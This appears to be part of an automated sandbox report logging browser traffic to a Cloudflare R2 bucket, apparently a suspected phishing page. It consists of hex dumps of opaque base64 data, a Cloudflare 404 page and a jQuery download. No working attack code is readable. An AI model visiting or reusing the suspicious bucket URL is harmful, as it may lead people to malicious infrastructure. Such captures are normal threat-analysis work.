                                                                                                                                                                                                        Data Ascii: ywogRIyp//8ADsyZsueWZYGedpTjII0AbhQV7I/t88Ig3ybS+uHTp0vufeuqp3z700ENPrlixYuWqVata8EWRtpEjRxa+/vWvL8Rxc9FIObuFmQ1plzxQzgOhk5arTFjyQPJA8kDywID1gAIdOUDlPJ5zGzFjxoyJ202atOfgIUPGFDC7hmfsGvHs27QKvAIFAU7TKy+//FE0/D42BSNqrzLlEovLxJjE60rd96y37dBDD60ZjNu7NpvBIC87++
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 2b 6e 4d 58 58 4c 44 37 78 7a 37 32 73 51 75 77 34 4f 4d 45 7a 49 51 4f 74 57 4f 50 66 43 44 39 50 64 71 53 38 56 56 50 66 4e 37 53 73 6c 6c 54 63 2f 4f 4c 57 43 44 79 6d 37 2f 2f 2f 65 2f 4e 45 51 50 64 45 50 74 57 56 58 4b 50 79 69 6c 50 48 69 67 39 48 35 49 2f 6b 67 65 53 42 35 49 48 6b 67 66 2b 62 52 35 51 73 42 4d 62 49 4d 77 43 45 46 51 77 4c 79 4a 59 4b 65 49 62 73 71 4f 6e 37 37 62 62 31 4e 71 36 75 75 31 78 64 57 39 35 38 73 6b 6e 76 33 33 51 51 51 65 39 69 48 6f 74 42 4b 43 63 6d 43 35 58 4a 71 59 6b 58 53 79 4c 5a 70 36 6c 69 30 73 57 4c 2f 34 68 58 6c 6d 79 6a 7a 56 6b 34 4a 4e 4e 77 49 68 32 64 6e 53 30 59 44 58 77 74 56 74 75 74 64 55 6c 4b 48 4c 46 4b 6a 63 6d 32 63 56 63 74 46 56 45 75 36 78 65 32 57 49 7a 67 41 6a 45 78 6e 37 31 6d 6d 74
                                                                                                                                                                                                        Data Ascii: +nMXXLD7xz72sQuw4OMEzIQOtWOPfCD9PdqS8VVPfN7SsllTc/OLWCDym7///e/NEQPdEPtWVXKPyilPHig9H5I/kgeSB5IHkgf+bR5QsBMbIMwCEFQwLyJYKeIbsqOn77bb1Nq6uu1xdW958sknv33QQQe9iHotBKCcmC5XJqYkXSyLZp6li0sWL/4hXlmyjzVk4JNNwIh2dnS0YDXwtVtutdUlKHLFKjcm2cVctFVEu6xe2WIzgAjExn71mmt
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 33 33 43 6b 77 65 53 42 35 49 48 4e 6e 59 50 78 42 66 4f 37 4c 47 71 72 6c 79 65 35 57 56 5a 66 4f 58 71 79 6d 48 6b 56 38 72 53 56 6c 36 39 65 6e 56 2b 55 47 64 6e 33 67 49 44 50 37 4e 6c 4e 46 70 5a 45 4f 4a 62 56 78 51 4b 34 30 34 36 36 61 54 33 59 69 5a 51 4b 30 50 74 57 54 6c 55 78 7a 62 46 74 50 51 79 4c 36 64 62 76 43 47 48 2f 48 48 31 39 66 55 48 49 50 44 69 4c 4a 6b 46 53 52 62 77 4d 41 6a 43 5a 6f 45 4d 63 73 4d 67 4e 4c 59 5a 41 56 73 39 5a 6a 4d 76 2f 75 6c 50 66 33 72 2b 70 5a 64 65 4f 6d 6e 4d 6d 44 47 63 76 61 4b 4e 32 6f 49 65 62 77 2f 4c 72 43 73 79 61 4a 77 39 65 2f 59 55 62 46 64 73 74 63 30 32 5a 31 4b 2f 66 45 43 39 6c 71 53 58 5a 57 77 6c 74 76 53 43 57 58 76 66 31 6d 53 53 4c 75 64 6e 42 70 73 52 33 39 72 71 7a 64 70 48 32 66 35 41
                                                                                                                                                                                                        Data Ascii: 33CkweSB5IHNnYPxBfO7LGqrlye5WVZfOXqymHkV8rSVl69enV+UGdn3gIDP7NlNFpZEOJbVxQK40466aT3YiZQK0PtWTlUxzbFtPQyL6dbvCGH/HH19fUHIPDiLJkFSRbwMAjCZoEMcsMgNLYZAVs9ZjMv/ulPf3r+pZdeOmnMmDGcvaKN2oIebw/LrCsyaJw9e/YUbFdstc02Z1K/fEC9lqSXZWwltvSCWXvf1mSSLudnBpsR39rqzdpH2f5A
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 38 33 33 76 62 6c 4c 56 38 2b 6f 62 68 34 38 64 4c 37 62 37 76 74 4a 37 4f 76 2b 4e 4c 56 6e 50 48 54 62 4b 6c 2b 57 2f 32 2b 63 55 36 70 4c 44 50 31 39 4a 75 37 32 72 51 66 73 42 37 51 79 54 35 67 48 5a 41 4f 50 48 6b 67 65 65 44 66 36 67 47 4f 51 66 48 57 6d 7a 48 39 35 65 74 4e 42 75 76 69 63 55 38 79 68 65 66 2f 2b 4d 63 2f 64 74 51 4f 48 54 6f 44 72 77 4d 35 75 4b 71 79 63 69 71 43 46 68 64 34 49 62 6a 77 49 59 63 46 4c 6c 74 76 76 66 58 4d 69 52 4d 6e 36 6e 6d 37 57 49 35 6b 4d 59 39 54 72 46 65 34 73 48 4c 74 47 59 41 56 33 76 57 75 64 2b 32 4e 6c 77 33 58 38 4a 61 6e 36 56 65 51 51 77 6e 43 47 41 53 42 5a 73 4a 73 57 65 32 55 6e 58 61 36 34 76 65 2f 2f 2f 31 78 65 4f 61 4f 74 34 35 4e 44 6e 4c 70 4b 4a 65 7a 61 59 79 48 34 4f 2b 69 69 79 36 61 64
                                                                                                                                                                                                        Data Ascii: 833vblLV8+obh48dL7b7vtJ7Ov+NLVnPHTbKl+W/2+cU6pLDP19Ju72rQfsB7QyT5gHZAOPHkgeeDf6gGOQfHWmzH95etNBuvicU8yhef/+Mc/dtQOHToDrwM5uKqyciqCFhd4IbjwIYcFLltvvfXMiRMn6nm7WI5kMY9TrFe4sHLtGYAV3vWud+2Nlw3X8Jan6VeQQwnCGASBZsJsWe2UnXa64ve///1xeOaOt45NDnLpKJezaYyH4O+iiy6ad
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 54 42 35 49 48 33 69 6f 50 5a 49 4d 67 6c 66 4f 31 74 62 55 31 57 48 56 62 66 64 52 52 52 34 33 48 34 6f 57 39 68 77 30 64 75 69 4f 43 6a 38 70 38 52 63 55 49 76 45 52 34 49 6d 61 42 6c 76 37 79 6c 37 2b 63 65 66 54 52 52 37 38 49 59 2b 4f 4c 57 6b 7a 72 4f 4d 70 68 30 6b 55 65 30 58 46 4f 32 72 5a 62 62 37 31 31 79 73 45 48 48 2f 77 39 72 4c 77 64 48 38 39 32 68 51 55 47 6c 49 41 67 68 49 4d 6e 37 4f 70 59 76 47 6a 52 4c 52 38 35 38 38 7a 7a 45 5a 78 71 31 61 33 30 5a 33 4f 32 7a 43 62 70 4a 63 37 41 6a 2b 58 43 69 42 45 6a 4b 6e 47 38 4a 30 33 64 65 65 66 4c 57 4d 46 6e 37 32 77 6d 7a 41 49 47 36 50 58 36 2b 32 47 66 74 61 55 4d 43 39 6a 77 79 62 69 57 6c 70 59 46 7a 63 33 4e 38 31 70 62 57 35 66 79 47 54 4f 38 30 43 2f 48 5a 77 77 48 46 34 74 6a 75 54
                                                                                                                                                                                                        Data Ascii: TB5IH3ioPZIMglfO1tbU1WHVbfdRRR43H4oW9hw0duiOCj8p8RcUIvER4ImaBlv7yl7+cefTRR78IY+OLWkzrOMph0kUe0XFO2rZbb711ysEHH/w9rLwdH892hQUGlIAghIMn7OpYvGjRLR8588zzEZxq1a30Z3O2zCbpJc7Aj+XCiBEjKnG8J03deefLWMFn72wmzAIG6PX6+2GftaUMC9jwybiWlpYFzc3N81pbW5fyGTO80C/HZwwHF4tjuT
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 57 47 6e 42 45 75 31 67 30 47 65 41 49 59 37 32 67 5a 38 72 75 41 75 34 31 51 34 61 31 49 46 62 77 53 2f 43 76 6d 2f 66 63 2b 65 64 64 33 31 35 39 75 79 35 4c 37 33 30 55 74 5a 57 4e 70 4d 64 68 54 50 4f 4f 47 4d 73 6e 6a 6d 63 67 76 66 39 6e 59 31 58 79 2b 77 41 62 55 56 71 6a 4c 53 35 59 4a 4f 74 65 72 43 46 56 51 72 79 6a 4d 37 79 5a 65 77 31 6e 6a 35 32 46 75 43 4b 4a 79 75 50 65 4d 4c 57 32 67 64 63 2f 47 47 76 67 4f 48 58 50 2f 43 35 4e 36 34 43 76 76 66 65 65 2f 2f 6e 38 43 50 66 66 7a 4d 38 72 48 37 44 38 7a 43 37 73 5a 2f 72 2f 46 53 75 76 73 39 63 4e 4d 67 53 6d 75 57 55 6b 67 66 4d 41 78 7a 38 55 6b 6f 65 53 42 37 59 4f 44 30 51 42 7a 34 36 51 6d 48 4b 46 51 41 56 74 39 78 79 79 38 4c 48 50 2f 4b 52 30 54 50 32 32 32 38 79 56 6f 37 57 2f 4d 2f
                                                                                                                                                                                                        Data Ascii: WGnBEu1g0GeAIY72gZ8ruAu41Q4a1IFbwS/Cvm/fc+edd3159uy5L730UtZWNpMdhTPOOGMsnjmcgvf9nY1Xy+wAbUVqjLS5YJOterCFVQryjM7yZew1nj52FuCKJyuPeMLW2gdc/GGvgOHXP/C5N64Cvvfee//n8CPffzM8rH7D8zC7sZ/r/FSuvs9cNMgSmuWUkgfMAxz8UkoeSB7YOD0QBz46QmHKFQAVt9xyy8LHP/KR0TP2228yVo7W/M/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        76192.168.2.549851104.18.2.354436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC675OUTGET /, HTTP/1.1
                                                                                                                                                                                                        Host: pub-e1c6f3d85d51402790227684363ac52c.r2.dev
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:23 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 27150
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c138628c17-EWR
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1189INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74
                                                                                                                                                                                                        Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43
                                                                                                                                                                                                        Data Ascii: <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31
                                                                                                                                                                                                        Data Ascii: 304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C1
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31
                                                                                                                                                                                                        Data Ascii: .941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 1
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: 684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10"
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 36 20 31 30 38 2e 35 30 34 20 33 37 2e 33 33 37 38 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d
                                                                                                                                                                                                        Data Ascii: 2.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill=
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 20 73 74 79 6c 65 3d 22 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30
                                                                                                                                                                                                        Data Ascii: 44 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.0
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 31 32 39 2e 38 35 32 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37
                                                                                                                                                                                                        Data Ascii: d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        77192.168.2.549852151.101.2.1374436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC649OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                        Host: code.jquery.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 89501
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1226366
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:23 GMT
                                                                                                                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740069-EWR
                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                        X-Cache-Hits: 5889, 0
                                                                                                                                                                                                        X-Timer: S1725034583.410720,VS0,VE1
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
